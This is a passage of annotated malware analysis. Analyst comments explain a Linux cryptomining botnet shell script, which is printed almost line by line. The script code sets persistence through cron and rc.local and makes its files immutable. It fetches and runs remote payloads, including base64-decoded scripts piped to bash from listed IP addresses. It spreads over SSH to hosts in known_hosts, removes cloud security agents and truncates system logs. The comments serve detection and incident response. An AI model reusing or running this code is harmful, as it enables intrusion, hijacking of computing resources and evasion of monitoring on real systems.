  # /etc/crontab is replaced with a stock-looking file whose last line runs ${LBIN1} daily
  # at 01:00.
  204.     ${sudo} echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root ${LBIN1}" > /etc/crontab && ${sudo} touch -acmr /bin/sh /etc/crontab
  # Three further cron entries (every 17, 23 and 11 minutes) re-download to ${LBIN7} and run
  # it; /etc/cron.d/.cronbus is a dot-file that a plain `ls` of the directory does not show.
  205.     ${sudo} echo -e "*/17 * * * * root ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /etc/cron.d/root && ${sudo} touch -acmr /bin/sh /etc/cron.d/root && ${sudo} chattr +i /etc/cron.d/root
  206.     ${sudo} echo -e "*/23 * * * * root ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /etc/cron.d/.cronbus && ${sudo} touch -acmr /bin/sh /etc/cron.d/.cronbus && ${sudo} chattr +i /etc/cron.d/.cronbus
  207.     ${sudo} echo -e "*/11 * * * * ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /var/spool/cron/root && ${sudo} touch -acmr /bin/sh /var/spool/cron/root && ${sudo} chattr +i /var/spool/cron/root
  208.     if [ ! -f /usr/bin/yum ]; then
  209.         ${sudo} mkdir -p /var/spool/cron/crontabs
  210.         ${sudo} echo -e "*/11 * * * * ${C3} && chmod +x ${LBIN7} && $(command -v sh) ${LBIN7}\n##" > /var/spool/cron/crontabs/root && ${sudo} touch -acmr /bin/sh /var/spool/cron/crontabs/root && ${sudo} chattr +i /var/spool/cron/crontabs/root
  211.     fi
  # The same download is placed as "cronlog" in cron.hourly, cron.daily and cron.monthly.
  212.     ${sudo} mkdir -p /etc/cron.hourly
  213.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN4}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN4}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN4}) && ${sudo} chmod 755 ${LBIN4}
  214.     ${sudo} mkdir -p /etc/cron.daily
  215.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN5}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN5}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN5}) && ${sudo} chmod 755 ${LBIN5}
  216.     ${sudo} mkdir -p /etc/cron.monthly
  217.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN6}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN6}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN6}) && ${sudo} chmod 755 ${LBIN6}
  # Lateral-movement attempt: when this account has known_hosts and id_rsa.pub, every IPv4
  # address in known_hosts receives a non-interactive ssh connection with host-key checking
  # disabled. On neighbouring hosts this shows up in sshd logs as key-based logins from the
  # infected machine; scope the incident from known_hosts accordingly.
  218.     if [ -f ${sshdir}/known_hosts ] && [ -f ${sshdir}/id_rsa.pub ]; then
  219.           for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ${sshdir}/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '${C3}|sh' & done
  220.     fi
  221.     ${sudo} touch -acmr /bin/sh /etc/cron.hourly/cronlog
  222.     ${sudo} touch -acmr /bin/sh /etc/cron.daily/cronlog
  223.     ${sudo} touch -acmr /bin/sh /etc/cron.monthly/cronlog
  # Boot persistence: appends "sh ${LBIN7}" ahead of a re-added "exit 0" in /etc/rc.local
  # unless the line is already there.
  224.     [[ ! $(${sudo} cat /etc/rc.local | grep "^sh ${LBIN7}") == "sh ${LBIN7}" ]] && { ${sudo} chattr -i -a /etc/rc.local >/dev/null 2>&1; ${sudo} chmod 755 /etc/rc.local >/dev/null 2>&1; ${sudo} sed -i '/^exit 0$/d' /etc/rc.local >/dev/null 2>&1; ${sudo} echo -e "sh ${LBIN7}" >> /etc/rc.local; ${sudo} echo -e "exit 0" >> /etc/rc.local; }
  225. }
  226.  
  227. function a() {
  # a(): removal of cloud host agents, run once per ${LPATH} (the main flow skips it when the
  # marker file ${LPATH}.a exists). Processes matching barad_agent* and anat* are killed;
  # if an 'aliyun' process is present the vendor uninstall scripts are downloaded and run
  # and the agent files deleted; if a 'yunjing' process is present the locally installed
  # uninstallers are run. A host agent that stops reporting right after a new cron entry or
  # an outbound fetch is therefore a useful correlation for detection.
  228.     touch "${LPATH}.a"
  229.     ${sudo} pkill barad_agent*; ${sudo} pkill anat*;
  230.     if ${sudo} ps aux|grep -v defunct|grep -i '[a]liyun'; then
  231.         ${wget} http://update.aegis.aliyun.com/download/uninstall.sh
  232.         chmod +x uninstall.sh
  233.         ${sudo} ./uninstall.sh
  234.         ${wget} http://update.aegis.aliyun.com/download/quartz_uninstall.sh
  235.         chmod +x quartz_uninstall.sh
  236.         ${sudo} ./quartz_uninstall.sh
  237.         rm -f uninstall.sh     quartz_uninstall.sh 2>/dev/null
  238.         ${sudo} pkill aliyun-service 2>/dev/null
  239.         ${sudo} rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service 2>/dev/null
  240.         ${sudo} rm -rf /usr/local/aegis* 2>/dev/null;
  241.     elif ${sudo} ps aux|grep -v defunct|grep -i '[y]unjing'; then
  242.         ${sudo} /usr/local/qcloud/stargate/admin/uninstall.sh
  243.         ${sudo} /usr/local/qcloud/YunJing/uninst.sh
  244.         ${sudo} /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  245.     fi
  246. }
  247. function f() {
  # f(): watchdog for the payload process. It keeps a single process matching ${grepmn}
  # alive and restarts it when either the process or any socket on :3333 is missing.
  # When SCN > 0 it also supervises the python payload started by e(). No call site for f()
  # is in the visible part of the listing. Port 3333 (plus 6379 and 8161 in the SCN branch)
  # are the port numbers this sample keys on.
  248.     NTOK=$(netstat --version 2>/dev/null|wc -l)
  249.     if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; else NETTOOL='netstat '; fi
  250.     port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :3333 | wc -l)
  251.     self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  # More than one matching process: all but the first listed are killed.
  252.     if [ ${self} -gt 1 ]; then
  253.         ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"|awk 'NR >= 2'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  254.     fi
  255.     port=$(${sudo} ${NETTOOL} -an 2>&1| grep :3333 | wc -l)
  256.     self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  # Restart path: unpack the archive if only it is present, then relaunch exactly as d()
  # does (huge pages, copy to /usr/bin or ${LPATH}, start with -c ${LPATH}wc.conf).
  257.     if [[ ${self} -eq 0 ]] || [[ ${port} -eq 0 ]];then
  258.         if [ ! -f ${LPATH}${LBIN3} ] && [ -f ${LPATH}${LBIN2} ]; then
  259.             unzip -qjoP no-password ${LPATH}${LBIN2} >/dev/null 2>&1; sleep 3
  260.             mv ${RBIN} ${LPATH}${LBIN3}
  261.             chmod +x ${LPATH}${LBIN3}
  262.             ${sudo} chattr +i ${LPATH}${LBIN3} >/dev/null 2>&1
  263.  
  264.         fi
  265.         if [[ -f ${LPATH}${LBIN3} ]]; then
  266.             ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
  267.             if [[ ${sudoer} == 1 ]]; then
  268.                 echo always | ${sudo} tee /sys/kernel/mm/transparent_hugepage/enabled >/dev/null 2>&1
  269.                 ${sudo} sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
  270.                 ${sudo} rm -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
  271.                 ${sudo} nohup "[${grepmn}]" -c ${LPATH}wc.conf >/dev/null 2>&1 &
  272.             else
  273.                 ${sudo} rm -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
  274.                 ${sudo} nohup ${LPATH}.${LBIN8} -c ${LPATH}wc.conf >/dev/null 2>&1 &
  275.             fi
  276.         fi
  277.     fi
  # SCN branch (disabled when SCN is 0): if the marker file is missing, no socket on :3333 or
  # :6379 is seen, or more than one base64 python process runs, processes holding :8161 and
  # non-redis processes holding :6379 are killed and e() is started again.
  278.     if [ ${SCN} -gt 0 ]; then
  279.         port2=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :6379 | wc -l)
  280.         pysc=$(${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|wc -l)
  281.         if [[ ! -f "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf" ]] || [[ ${port} -eq 0 ]] || [[ ${port2} -eq 0 ]] || [[ ${pysc} -gt 1 ]]; then
  282.             rm -rf "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
  283.             ${sudo} netstat -tanp 2>/dev/null|grep -v ctive|grep -v -|awk '/:8161 */ {split($NF,i1,"/"); print i1[1]}'|uniq|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  284.             ${sudo} netstat -tanp 2>/dev/null|grep -v redis|grep -v -|awk '/:6379 */ {split($NF,i2,"/"); print i2[1]}'|uniq|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  285.             #${sudo} killall -9 python >/dev/null 2>&1; ${sudo} killall -9 python2 >/dev/null 2>&1
  286.             [ ${pysc} -gt 1 ] && { ${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|uniq|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done; }
  287.             e 2>/dev/null
  288.         fi
  289.     fi
  290. }
  291. function g() {
  # g(): trims surplus watchdog loops. When more than two processes show ' sleep 30' in
  # `ps aux`, the parents of all but the first two (PPID above 301, not this shell) and then
  # the sleep processes themselves are killed. Called from b() on roughly one run in five.
  292.     if [ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -gt 2 ]; then
  293.         ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'sleep 30'|awk 'NR >= 3'|awk '{print $1}'|while read pid _; do [ ${pid} -gt 301 ] && [ ${pid} -ne "$$" ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done
  294.         ${sudo} ps aux|grep -v grep|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|awk 'NR >= 3'|awk '{print $2}'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  295.     fi
  296. }
  297. sudoer=1
  298. sudo=''
  299. grepmn="${LBIN8}"
  300. if [ "$(whoami)" != "root" ]; then
  301.     sudo="sudo "
  302.     #timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; grepmn=".${LBIN8}"; }
  303.     timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; grepmn=".${LBIN8}"; }
  304. fi
  305. rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
  306. echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; rm -f "$(pwd)/.${rand}" >/dev/null 2>&1
  307. echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1
  308. echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
  309. echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1
  310. mkdir -p ${LPATH} >/dev/null 2>&1
  311. ${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 1755 ${LPATH} >/dev/null 2>&1
  312. if [ "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi
  313. C1="*/4 * * * * ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
  314. C2="*/8 * * * * root ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
  315. C3="${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN7}||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN7}||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN7}||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN7}||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN7}||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN7})"
  316. if [ -f /usr/bin/yum ]; then
  317.     INSTALLER="yum reinstall -y -q -e 0 "
  318. elif [ -f /usr/bin/apt-get ]; then
  319.     INSTALLER="DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall "
  320. elif [ -f /usr/bin/pacman ]; then
  321.     INSTALLER="pacman -S --noconfirm "
  322. elif [ -f /sbin/apk ]; then
  323.     INSTALLER="apk --no-cache -f add "
  324. fi
  325. NTOK=$(netstat --version 2>/dev/null|wc -l)
  326. if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; ${sudo} ${INSTALLER} net-tools >/dev/null 2>&1; else NETTOOL='netstat '; fi
  327.  
  328. if [ ! -f "${LPATH}.a" ]; then
  329.     a >/dev/null 2>&1 &
  330. fi
  # Analyst note: UD is the body served at ${RHOST}${TORn}src/ud, fetched through the
  # curl/wget fallback chain and compared as an integer below (empty counts as 0);
  # presumably a remotely controlled update flag, to be confirmed from the server side.
  # wdog0 counts ps lines containing " sleep 30" (lines containing "sh " are excluded).
  # When UD > 0 and such a process exists:
  #   - if UD > 2, every process matching ${grepmn} with PID above 301 gets SIGKILL;
  #   - the parents of the "sleep 30" processes (ppid column), then the processes
  #     themselves, get SIGKILL, again only for PIDs above 301;
  #   - src/main is fetched, base64-decoded and piped into bash in the background,
  #     and this script exits.
  # Risk: the piped content is remote, unauthenticated and never written to disk, so
  # file-based scanning will not see it. Detection: process trees where curl or wget
  # feeds `base64 -d` feeding bash.
  331. UD=$(${curl} ${COPTS} ${RHOST}${TOR1}src/ud||${curl} ${COPTS} ${RHOST}${TOR2}src/ud||${curl} ${COPTS} ${RHOST}${TOR3}src/ud||${wget} ${WOPTS} ${RHOST}${TOR1}src/ud||${wget} ${WOPTS} ${RHOST}${TOR2}src/ud||${wget} ${WOPTS} ${RHOST}${TOR3}src/ud)
  332. rm -f ./ud ./ud.* >/dev/null 2>&1
  333. wdog0=$(ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|wc -l)
  334. if [ ${UD:-0} -gt 0 ] && [ ${wdog0} -gt 0 ]; then
  335.     if [ ${UD:-0} -gt 2 ]; then ${sudo} ps ax|grep -v grep|grep -vi defunct|grep "${grepmn}"|while read pid _; do [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done; fi
  336.     ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'sleep 30'|awk '{print $1}'|while read pid _; do [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done
  337.     ${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|awk '{print $2}'|while read pid _; do [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done
  338.     (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash) &
  339.     exit 0
  340. fi
  # Analyst note: `self` counts processes whose ps line matches ${grepmn} (set outside
  # this part of the listing). With more than one match, every match after the first
  # listed gets SIGKILL.
  # selfp becomes the PID of the first match only when its %CPU column is <= 34.0;
  # otherwise it is empty and treated as 0. t is a random integer in 1..99; when
  # selfp > 301 and t < 21 (about one run in five), all matching processes are killed.
  # Detection: repeated `kill -9` against the same process name from a script that
  # also restarts it.
  341. self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  342. if [ ${self} -gt 1 ]; then
  343.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"|awk 'NR >= 2'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  344. fi
  345. selfp=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|head -n 1|awk '{if($3<=34.0) print $2}')
  346. t=$(shuf -i 1-99 -n 1)
  347. if [ ${selfp:-0} -gt 301 ] && [ $t -lt 21 ]; then
  348.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  349. fi
  # Analyst note: starts function `b` in the background unconditionally, and function
  # `c` only when ${sudoer} equals 1. Both functions and the sudoer flag are defined
  # outside this part of the listing; all of their output is discarded.
  350. b >/dev/null 2>&1 &
  351. if [[ ${sudoer} == 1 ]]; then
  352.     c >/dev/null 2>&1 &
  353. fi
  # Analyst note: health check followed by a restart. `port` counts socket lines
  # containing ":3333", `self` counts processes matching ${grepmn}, and selfp here is
  # the %CPU column of the first match (not read again in this part of the listing).
  # When either count is zero, wdog is cleared and, if ${LPATH}${LBIN3} exists:
  #   - sudoer == 1: the immutable attribute is cleared on /usr/bin/[${grepmn}], the
  #     file is replaced by a copy of ${LPATH}${LBIN3} and made executable;
  #   - otherwise the copy goes to the hidden file ${LPATH}.${LBIN8};
  #   and a nohup launch referencing ${LPATH}wc.conf is issued in the background.
  # Function `d` (defined elsewhere) is then called in either case.
  # Detection: a file in /usr/bin whose name is wrapped in square brackets
  # (presumably to resemble a kernel thread in ps output), chattr activity on
  # /usr/bin, and sockets on port 3333.
  354. port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :3333 | wc -l)
  355. self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  356. selfp=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|head -n 1|awk '{print $3}')
  357. wdog=1
  358. if [[ ${self} -eq 0 ]] || [[ ${port} -eq 0 ]]; then
  359.     wdog=0
  360.     if [[ -f ${LPATH}${LBIN3} ]]; then
  361.         ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
  362.         if [[ ${sudoer} == 1 ]]; then
  363.             ${sudo} rm -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
  364.             ${sudo} nohup "[${grepmn}]"-c ${LPATH}wc.conf >/dev/null 2>&1 &
  365.         else
  366.             ${sudo} rm -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
  367.             ${sudo} nohup ${LPATH}.${LBIN8} -c ${LPATH}wc.conf  >/dev/null 2>&1 &
  368.         fi
  369.     fi
  370.     d
  371. fi
  # Analyst note: runs only when SCN (set outside this part of the listing) is > 0.
  # Counts socket lines containing ":3333" and ":6379" (6379 is the default Redis
  # port) and processes whose command line contains the literal
  # " -c import base64;exec(base64.b64decode(".
  # If UD > 1, the marker file below is missing, either socket count is zero, or more
  # than one such process exists, then: the marker is removed; PIDs that
  # `netstat -tanp` shows on :6379, on lines containing neither "redis" nor "-", get
  # SIGKILL; when pysc > 1 all base64-exec processes get SIGKILL; and function `e`
  # (defined elsewhere) is started in the background.
  # Detection: the fixed marker file name under ${LPATH}, interpreter processes started
  # with an inline base64-exec one-liner, and non-Redis processes talking to 6379.
  372. if [ ${SCN} -gt 0 ]; then
  373.     port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :3333 | wc -l)
  374.     port2=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :6379 | wc -l)
  375.     pysc=$(${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|wc -l)
  376.     if [[ ${UD} -gt 1 ]] || [[ ! -f "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf" ]] || [[ ${port} -eq 0 ]] || [[ ${port2} -eq 0 ]] || [[ ${pysc} -gt 1 ]]; then
  377.         rm -rf "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
  378.         ${sudo} netstat -tanp 2>/dev/null|grep -v redis|grep -v -|awk '/:6379 */ {split($NF,i2,"/"); print i2[1]}'|uniq|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  379.         [ ${pysc} -gt 1 ] && { ${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|uniq|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done; }
  380.         e >/dev/null 2>&1 &
  381.     fi
  382. fi
  # Analyst note (anti-forensics): when sudoer == 1, the current user's mail spool (if
  # present), /var/log/wtmp, /var/log/secure and /var/log/cron are emptied.
  # `0>FILE` opens FILE for writing on descriptor 0, which truncates it, while echo's
  # own output goes to /dev/null, so the files end up zero-length rather than holding
  # a "0".
  # Detection and mitigation: alert on zero-byte or abruptly shrunken wtmp/secure/cron
  # files and ship these logs off-host so local truncation does not erase the record.
  383. if [ ${sudoer} == 1 ]; then
  384.     [ -f /var/spool/mail/$USER ] && { ${sudo} echo 0>/var/spool/mail/$USER >/dev/null 2>&1; }
  385.     ${sudo} echo 0>/var/log/wtmp >/dev/null 2>&1
  386.     ${sudo} echo 0>/var/log/secure >/dev/null 2>&1
  387.     ${sudo} echo 0>/var/log/cron >/dev/null 2>&1
  388. fi
  # Analyst note: calls function `g` (defined outside this part of the listing), then
  # fetches src/wd through the same curl/wget fallback chain, base64-decodes it and
  # pipes it into bash in the background. As with src/main, the second stage is
  # remote, unauthenticated and never touches disk; capture it from network traffic
  # or process memory rather than expecting a file artefact.
  389. g
  390. (${curl} ${COPTS} ${RHOST}${TOR1}src/wd||${curl} ${COPTS} ${RHOST}${TOR2}src/wd||${curl} ${COPTS} ${RHOST}${TOR3}src/wd||${wget} ${WOPTS} ${RHOST}${TOR1}src/wd||${wget} ${WOPTS} ${RHOST}${TOR2}src/wd||${wget} ${WOPTS} ${RHOST}${TOR3}src/wd)|base64 -d |${sudo} $(command -v bash) &
  # Analyst note: UD > 0 clears wdog; wdog is only referenced by the commented-out
  # condition below, so it has no effect in this part of the listing.
  # If fewer than two ps lines contain " sleep 30" (lines with "sh " excluded), a
  # background loop is started that, every 30 seconds, relaunches functions `b` and
  # `f` (defined elsewhere) and truncates the user's mail spool if it exists.
  # Detection: a long-lived shell with a recurring `sleep 30` child; killing only the
  # payload leaves this loop free to bring it back, so remove the loop and the cron
  # persistence together.
  391. if [ ${UD:-0} -gt 0 ]; then wdog=0; fi
  392. #if [[ ${wdog} -eq 0 ]] || [[ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -eq 0 ]] || [[ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -gt 2 ]]; then
  393. if [[ $(${sudo} ps aux|grep -v 'grep'|grep -v 'sh '|grep -v defunct|grep ' sleep 30'|wc -l) -lt 2 ]]; then
  394.     while true; do
  395.         b >/dev/null 2>&1 &
  396.         f >/dev/null 2>&1 &
  397.         if [ -f /var/spool/mail/$USER ]; then ${sudo} echo 0>/var/spool/mail/$USER >/dev/null 2>&1; fi
  398.         sleep 30
  399.     done &
  400. fi
  # Analyst note: looks for an ESTABLISHED connection to 185.161.70.34:3333,
  # 154.16.67.133:80 or 205.185.122.99:3333. When one exists the script only prints
  # the working directory; otherwise it downloads wc.conf over plain HTTP from
  # 154.16.67.136 (wget) or, failing that, 107.174.47.156 (curl) into ${LPATH}wc.conf
  # and issues the nohup launch line again.
  # Indicators taken from these lines: the five addresses above, destination port
  # 3333, and the file name wc.conf. Useful for egress blocking and for retrospective
  # searches of flow and proxy logs.
  401. netstat -ant|grep '185.161.70.34:3333\|154.16.67.133:80\|205.185.122.99:3333'|grep 'ESTABLISHED'|grep -v grep
  402. if [ $? -eq 0 ]
  403. then
  404. pwd
  405. else
  406. wget -O ${LPATH}wc.conf http://154.16.67.136/wc.conf || curl -o ${LPATH}wc.conf http://107.174.47.156/wc.conf
  407. ${sudo} nohup "[${grepmn}]"-c ${LPATH}wc.conf >/dev/null 2>&1 &
  408. fi